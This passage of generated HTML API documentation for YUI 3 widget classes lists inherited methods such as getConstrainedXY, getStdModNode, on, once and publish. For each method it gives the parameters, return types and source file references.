looking for a button by numerical index, or by name but scoped to a
particular section.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>:
The button node.
</div>
</div>
</div>
<div id="method_getClassName" class="method item inherited">
<h3 class="name"><code>getClassName</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>args</code>
</li>
</ul><span class="paren">)</span>
</div>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method_getClassName">
Widget
</a>
but overwritten in
<a href="../files/widget_js_Widget.js.html#l309"><code>widget/js/Widget.js:309</code></a>
</p>
</div>
<div class="description">
<p>Generate a standard prefixed classname for the Widget, prefixed by the default prefix defined
by the <code>Y.config.classNamePrefix</code> attribute used by <code>ClassNameManager</code> and
<code>Widget.NAME.toLowerCase()</code> (e.g. "yui-widget-xxxxx-yyyyy", based on default values for
the prefix and widget class name).</p>
<p>
The instance based version of this method can be used to generate standard prefixed classnames,
based on the instances NAME, as opposed to Widget.NAME. This method should be used when you
need to use a constant class name across different types instances.
</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">args</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String*</a></span>
<span class="flag multiple" title="This argument may occur one or more times.">multiple</span>
<div class="param-description">
<p>0..n strings which should be concatenated, using the default separator defined by ClassNameManager, to create the class name</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method_getConstrainedXY" class="method item inherited">
<h3 class="name"><code>getConstrainedXY</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>xy</code>
</li>
<li class="arg">
<code>node</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Array" class="crosslink external" target="_blank">Array</a></span>
</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPositionConstrain.html#method_getConstrainedXY">WidgetPositionConstrain</a>:
<a href="../files/widget-position-constrain_js_Widget-PositionConstrain.js.html#l106"><code>widget-position-constrain/js/Widget-PositionConstrain.js:106</code></a>
</p>
</div>
<div class="description">
<p>Calculates the constrained positions for the XY positions provided, using
the provided node argument is passed in. If no node value is passed in, the value of
the "constrain" attribute is used.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">xy</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Array" class="crosslink external" target="_blank">Array</a></span>
<div class="param-description">
<p>The xy values to constrain</p>
</div>
</li>
<li class="param">
<code class="param-name">node</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a> | boolean</span>
<div class="param-description">
<p>Optional. The node to constrain to, or true for the viewport</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Array" class="crosslink external" target="_blank">Array</a></span>:
The constrained xy values
</div>
</div>
</div>
<div id="method_getDefaultLocale" class="method item inherited">
<h3 class="name"><code>getDefaultLocale</code></h3>
<span class="paren">()</span>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method_getDefaultLocale">Widget</a>:
<a href="../files/widget_js_WidgetLocale.js.html#l150"><code>widget/js/WidgetLocale.js:150</code></a>
</p>
</div>
<div class="description">
<p>Returns the default locale for the widget (the locale value defined by the
widget class, or provided by the user during construction).</p>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>:
The default locale for the widget
</div>
</div>
</div>
<div id="method_getEvent" class="method item inherited">
<h3 class="name"><code>getEvent</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>type</code>
</li>
<li class="arg">
<code>prefixed</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="../classes/CustomEvent.html" class="crosslink">CustomEvent</a></span>
</span>
<div class="meta">
<p>Inherited from
<a href="../classes/EventTarget.html#method_getEvent">EventTarget</a>:
<a href="../files/event-custom_js_event-target.js.html#l726"><code>event-custom/js/event-target.js:726</code></a>
</p>
</div>
<div class="description">
<p>Returns the custom event of the provided type has been created, a
falsy value otherwise</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">type</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>the type, or name of the event</p>
</div>
</li>
<li class="param">
<code class="param-name">prefixed</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>if true, the type is prefixed already</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/CustomEvent.html" class="crosslink">CustomEvent</a></span>:
the custom event or null
</div>
</div>
</div>
<div id="method_getSkinName" class="method item inherited">
<h3 class="name"><code>getSkinName</code></h3>
<span class="paren">()</span>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method_getSkinName">Widget</a>:
<a href="../files/widget_js_WidgetSkin.js.html#l13"><code>widget/js/WidgetSkin.js:13</code></a>
</p>
</div>
<div class="description">
<p>Returns the name of the skin that's currently applied to the widget.
This is only really useful after the widget's DOM structure is in the
document, either by render or by progressive enhancement. Searches up
the Widget's ancestor axis for a class yui3-skin-(name), and returns the
(name) portion. Otherwise, returns null.</p>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>:
the name of the skin, or null (yui3-skin-sam => sam)
</div>
</div>
</div>
<div id="method_getStdModNode" class="method item inherited">
<h3 class="name"><code>getStdModNode</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>section</code>
</li>
<li class="arg">
<code>forceCreate</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStdMod.html#method_getStdModNode">WidgetStdMod</a>:
<a href="../files/widget-stdmod_js_Widget-StdMod.js.html#l686"><code>widget-stdmod/js/Widget-StdMod.js:686</code></a>
</p>
</div>
<div class="description">
<p>Returns the node reference for the specified <code>section</code>.</p>
<p><strong>Note:</strong> The DOM is not queried for the node reference. The reference
stored by the widget instance is returned if it was set. Passing a
truthy for <code>forceCreate</code> will create the section node if it does not
already exist.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">section</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The section whose node reference is required.
Either <code>WidgetStdMod.HEADER</code>, <code>WidgetStdMod.BODY</code>, or
<code>WidgetStdMod.FOOTER</code>.</p>
</div>
</li>
<li class="param">
<code class="param-name">forceCreate</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<div class="param-description">
<p>Whether the section node should be created
if it does not already exist.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>:
The node reference for the <code>section</code>, or null if not set.
</div>
</div>
</div>
<div id="method_getString" class="method item deprecated inherited">
<h3 class="name"><code>getString</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>key</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
</span>
<span class="flag deprecated" title="Used by deprecated WidgetLocale implementations.">deprecated</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method_getString">
Widget
</a>
but overwritten in
<a href="../files/widget_js_Widget.js.html#l1223"><code>widget/js/Widget.js:1223</code></a>
</p>
<p>Deprecated: Used by deprecated WidgetLocale implementations.</p>
</div>
<div class="description">
<p>Helper method to get a specific string value</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">key</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>:
The string
</div>
</div>
</div>
<div id="method_getStrings" class="method item deprecated inherited">
<h3 class="name"><code>getStrings</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>key</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
</span>
<span class="flag deprecated" title="Used by deprecated WidgetLocale implementations.">deprecated</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method_getStrings">
Widget
</a>
but overwritten in
<a href="../files/widget_js_Widget.js.html#l1235"><code>widget/js/Widget.js:1235</code></a>
</p>
<p>Deprecated: Used by deprecated WidgetLocale implementations.</p>
</div>
<div class="description">
<p>Helper method to get the complete set of strings for the widget</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">key</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>:
The strings
</div>
</div>
</div>
<div id="method_getTargets" class="method item inherited">
<h3 class="name"><code>getTargets</code></h3>
<span class="paren">()</span>
<span class="returns-inline">
<span class="type"></span>
</span>
<div class="meta">
<p>Inherited from
<a href="../classes/EventTarget.html#method_getTargets">EventTarget</a>:
<a href="../files/event-custom_js_event-facade.js.html#l405"><code>event-custom/js/event-facade.js:405</code></a>
</p>
</div>
<div class="description">
<p>Returns an array of bubble targets for this object.</p>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
EventTarget[]
</div>
</div>
</div>
<div id="method_hide" class="method item inherited">
<h3 class="name"><code>hide</code></h3>
<span class="paren">()</span>
<span class="flag chainable">chainable</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method_hide">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l643"><code>widget/js/Widget.js:643</code></a>
</p>
</div>
<div class="description">
<p>Hides the Widget by setting the "visible" attribute to "false".</p>
</div>
</div>
<div id="method_init" class="method item inherited">
<h3 class="name"><code>init</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>config</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="../classes/Base.html" class="crosslink">Base</a></span>
</span>
<span class="flag chainable">chainable</span>
<div class="meta">
<p>Inherited from
<a href="../classes/BaseCore.html#method_init">
BaseCore
</a>
but overwritten in
<a href="../files/base_js_Base.js.html#l191"><code>base/js/Base.js:191</code></a>
</p>
</div>
<div class="description">
<p>Init lifecycle method, invoked during construction.
Fires the init event prior to setting up attributes and
invoking initializers for the class hierarchy.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">config</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>Object with configuration property name/value pairs</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/Base.html" class="crosslink">Base</a></span>:
A reference to this object
</div>
</div>
</div>
<div id="method_initializer" class="method item protected inherited">
<h3 class="name"><code>initializer</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>config</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method_initializer">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l380"><code>widget/js/Widget.js:380</code></a>
</p>
</div>
<div class="description">
<p>Initializer lifecycle implementation for the Widget class. Registers the
widget instance, and runs through the Widget's HTML_PARSER definition.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">config</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>Configuration object literal for the widget</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method_isNested" class="method item public inherited">
<h3 class="name"><code>isNested</code></h3>
<span class="paren">()</span>
<span class="flag public">public</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetModality.html#method_isNested">WidgetModality</a>:
<a href="../files/widget-modality_js_Widget-Modality.js.html#l476"><code>widget-modality/js/Widget-Modality.js:476</code></a>
</p>
</div>
<div class="description">
<p>Returns a boolean representing whether the current widget is in a "nested modality" state.
This is done by checking the number of widgets currently on the stack.</p>
</div>
</div>
<div id="method_isRoot" class="method item inherited">
<h3 class="name"><code>isRoot</code></h3>
<span class="paren">()</span>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method_isRoot">Widget</a>:
<a href="../files/widget-child_js_Widget-Child.js.html#l267"><code>widget-child/js/Widget-Child.js:267</code></a>
</p>
</div>
<div class="description">
<p>Determines if the Widget is the root Widget in the
object hierarchy.</p>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>:
Boolean indicating if Widget is the root Widget in the
object hierarchy.
</div>
</div>
</div>
<div id="method_modifyAttr" class="method item inherited">
<h3 class="name"><code>modifyAttr</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>name</code>
</li>
<li class="arg">
<code>config</code>
</li>
</ul><span class="paren">)</span>
</div>
<div class="meta">
<p>Inherited from
<a href="../classes/AttributeExtras.html#method_modifyAttr">AttributeExtras</a>:
<a href="../files/attribute_js_AttributeExtras.js.html#l39"><code>attribute/js/AttributeExtras.js:39</code></a>
</p>
</div>
<div class="description">
<p>Updates the configuration of an attribute which has already been added.</p>
<p>
The properties which can be modified through this interface are limited
to the following subset of attributes, which can be safely modified
after a value has already been set on the attribute: readOnly, writeOnce,
broadcast and getter.
</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">name</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The name of the attribute whose configuration is to be updated.</p>
</div>
</li>
<li class="param">
<code class="param-name">config</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>An object with configuration property/value pairs, specifying the configuration properties to modify.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method_move" class="method item inherited">
<h3 class="name"><code>move</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>x</code>
</li>
<li class="arg">
<code>y</code>
</li>
<li class="arg">
<code>x,</code>
</li>
</ul><span class="paren">)</span>
</div>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPosition.html#method_move">WidgetPosition</a>:
<a href="../files/widget-position_js_Widget-Position.js.html#l157"><code>widget-position/js/Widget-Position.js:157</code></a>
</p>
</div>
<div class="description">
<p>Moves the Widget to the specified page xy co-ordinate position.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">x</code>
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>
<div class="param-description">
<p>The new x position</p>
</div>
</li>
<li class="param">
<code class="param-name">y</code>
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>
<div class="param-description">
<p>The new y position</p>
<p>Or</p>
</div>
</li>
<li class="param">
<code class="param-name">x,</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Array" class="crosslink external" target="_blank">Array</a></span>
<div class="param-description">
<p>y values passed as an array ([x, y]), to support
simple pass through of Node.getXY results</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method_next" class="method item inherited">
<h3 class="name"><code>next</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>circular</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="../classes/Widget.html" class="crosslink">Widget</a></span>
</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method_next">Widget</a>:
<a href="../files/widget-child_js_Widget-Child.js.html#l191"><code>widget-child/js/Widget-Child.js:191</code></a>
</p>
</div>
<div class="description">
<p>Returns the Widget's next sibling.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">circular</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<div class="param-description">
<p>Boolean indicating if the parent's first child
should be returned if the child has no next sibling.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/Widget.html" class="crosslink">Widget</a></span>:
Widget instance.
</div>
</div>
</div>
<div id="method_on" class="method item inherited">
<h3 class="name"><code>on</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>type</code>
</li>
<li class="arg">
<code>fn</code>
</li>
<li class="arg">
<code class="optional">[context]</code>
</li>
<li class="arg">
<code class="optional">[arg*]</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="../classes/EventHandle.html" class="crosslink">EventHandle</a></span>
</span>
<div class="meta">
<p>Inherited from
<a href="../classes/EventTarget.html#method_on">EventTarget</a>:
<a href="../files/event-custom_js_event-target.js.html#l191"><code>event-custom/js/event-target.js:191</code></a>
</p>
</div>
<div class="description">
<p>Subscribe a callback function to a custom event fired by this object or
from an object that bubbles its events to this object.</p>
<p>Callback functions for events published with <code>emitFacade = true</code> will
receive an <code>EventFacade</code> as the first argument (typically named "e").
These callbacks can then call <code>e.preventDefault()</code> to disable the
behavior published to that event's <code>defaultFn</code>. See the <code>EventFacade</code>
API for all available properties and methods. Subscribers to
non-<code>emitFacade</code> events will receive the arguments passed to <code>fire()</code>
after the event name.</p>
<p>To subscribe to multiple events at once, pass an object as the first
argument, where the key:value pairs correspond to the eventName:callback,
or pass an array of event names as the first argument to subscribe to
all listed events with the same callback.</p>
<p>Returning <code>false</code> from a callback is supported as an alternative to
calling <code>e.preventDefault(); e.stopPropagation();</code>. However, it is
recommended to use the event methods whenever possible.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">type</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The name of the event</p>
</div>
</li>
<li class="param">
<code class="param-name">fn</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Function" class="crosslink external" target="_blank">Function</a></span>
<div class="param-description">
<p>The callback to execute in response to the event</p>
</div>
</li>
<li class="param">
<code class="param-name optional">[context]</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>Override <code>this</code> object in callback</p>
</div>
</li>
<li class="param">
<code class="param-name optional">[arg*]</code>
<span class="type">Any</span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>0..n additional arguments to supply to the subscriber</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/EventHandle.html" class="crosslink">EventHandle</a></span>:
A subscription handle capable of detaching that
subscription
</div>
</div>
</div>
<div id="method_once" class="method item inherited">
<h3 class="name"><code>once</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>type</code>
</li>
<li class="arg">
<code>fn</code>
</li>
<li class="arg">
<code class="optional">[context]</code>
</li>
<li class="arg">
<code class="optional">[arg*]</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="../classes/EventHandle.html" class="crosslink">EventHandle</a></span>
</span>
<div class="meta">
<p>Inherited from
<a href="../classes/EventTarget.html#method_once">EventTarget</a>:
<a href="../files/event-custom_js_event-target.js.html#l127"><code>event-custom/js/event-target.js:127</code></a>
</p>
</div>
<div class="description">
<p>Listen to a custom event hosted by this object one time.
This is the equivalent to <code>on</code> except the
listener is immediatelly detached when it is executed.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">type</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The name of the event</p>
</div>
</li>
<li class="param">
<code class="param-name">fn</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Function" class="crosslink external" target="_blank">Function</a></span>
<div class="param-description">
<p>The callback to execute in response to the event</p>
</div>
</li>
<li class="param">
<code class="param-name optional">[context]</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>Override <code>this</code> object in callback</p>
</div>
</li>
<li class="param">
<code class="param-name optional">[arg*]</code>
<span class="type">Any</span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>0..n additional arguments to supply to the subscriber</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/EventHandle.html" class="crosslink">EventHandle</a></span>:
A subscription handle capable of detaching the
subscription
</div>
</div>
</div>
<div id="method_onceAfter" class="method item inherited">
<h3 class="name"><code>onceAfter</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>type</code>
</li>
<li class="arg">
<code>fn</code>
</li>
<li class="arg">
<code class="optional">[context]</code>
</li>
<li class="arg">
<code class="optional">[arg*]</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="../classes/EventHandle.html" class="crosslink">EventHandle</a></span>
</span>
<div class="meta">
<p>Inherited from
<a href="../classes/EventTarget.html#method_onceAfter">EventTarget</a>:
<a href="../files/event-custom_js_event-target.js.html#l149"><code>event-custom/js/event-target.js:149</code></a>
</p>
</div>
<div class="description">
<p>Listen to a custom event hosted by this object one time.
This is the equivalent to <code>after</code> except the
listener is immediatelly detached when it is executed.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">type</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The name of the event</p>
</div>
</li>
<li class="param">
<code class="param-name">fn</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Function" class="crosslink external" target="_blank">Function</a></span>
<div class="param-description">
<p>The callback to execute in response to the event</p>
</div>
</li>
<li class="param">
<code class="param-name optional">[context]</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>Override <code>this</code> object in callback</p>
</div>
</li>
<li class="param">
<code class="param-name optional">[arg*]</code>
<span class="type">Any</span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>0..n additional arguments to supply to the subscriber</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/EventHandle.html" class="crosslink">EventHandle</a></span>:
A subscription handle capable of detaching that
subscription
</div>
</div>
</div>
<div id="method_parseType" class="method item inherited">
<h3 class="name"><code>parseType</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>type</code>
</li>
<li class="arg">
<code class="optional">[pre=this._yuievt.config.prefix]</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Array" class="crosslink external" target="_blank">Array</a></span>
</span>
<div class="meta">
<p>Inherited from
<a href="../classes/EventTarget.html#method_parseType">EventTarget</a>:
<a href="../files/event-custom_js_event-target.js.html#l171"><code>event-custom/js/event-target.js:171</code></a>
</p>
<p>Available since 3.3.0</p>
</div>
<div class="description">
<p>Takes the type parameter passed to 'on' and parses out the
various pieces that could be included in the type. If the
event type is passed without a prefix, it will be expanded
to include the prefix one is supplied or the event target
is configured with a default prefix.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">type</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>the type</p>
</div>
</li>
<li class="param">
<code class="param-name optional">[pre=this._yuievt.config.prefix]</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>the prefix</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Array" class="crosslink external" target="_blank">Array</a></span>:
an array containing:
* the detach category, if supplied,
* the prefixed event type,
* whether or not this is an after listener,
* the supplied event type
</div>
</div>
</div>
<div id="method_previous" class="method item inherited">
<h3 class="name"><code>previous</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>circular</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="../classes/Widget.html" class="crosslink">Widget</a></span>
</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method_previous">Widget</a>:
<a href="../files/widget-child_js_Widget-Child.js.html#l216"><code>widget-child/js/Widget-Child.js:216</code></a>
</p>
</div>
<div class="description">
<p>Returns the Widget's previous sibling.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">circular</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<div class="param-description">
<p>Boolean indicating if the parent's last child
should be returned if the child has no previous sibling.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/Widget.html" class="crosslink">Widget</a></span>:
Widget instance.
</div>
</div>
</div>
<div id="method_publish" class="method item inherited">
<h3 class="name"><code>publish</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>type</code>
</li>
<li class="arg">
<code>opts</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="../classes/CustomEvent.html" class="crosslink">CustomEvent</a></span>
</span>
<div class="meta">
<p>Inherited from
<a href="../classes/EventTarget.html#method_publish">EventTarget</a>:
<a href="../files/event-custom_js_event-target.js.html#l488"><code>event-custom/js/event-target.js:488</code></a>
</p>
</div>
<div class="description">
<p>Creates a new custom event of the specified type. If a custom event
by that name already exists, it will not be re-created. In either
case the custom event is returned.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">type</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>the type, or name of the event</p>
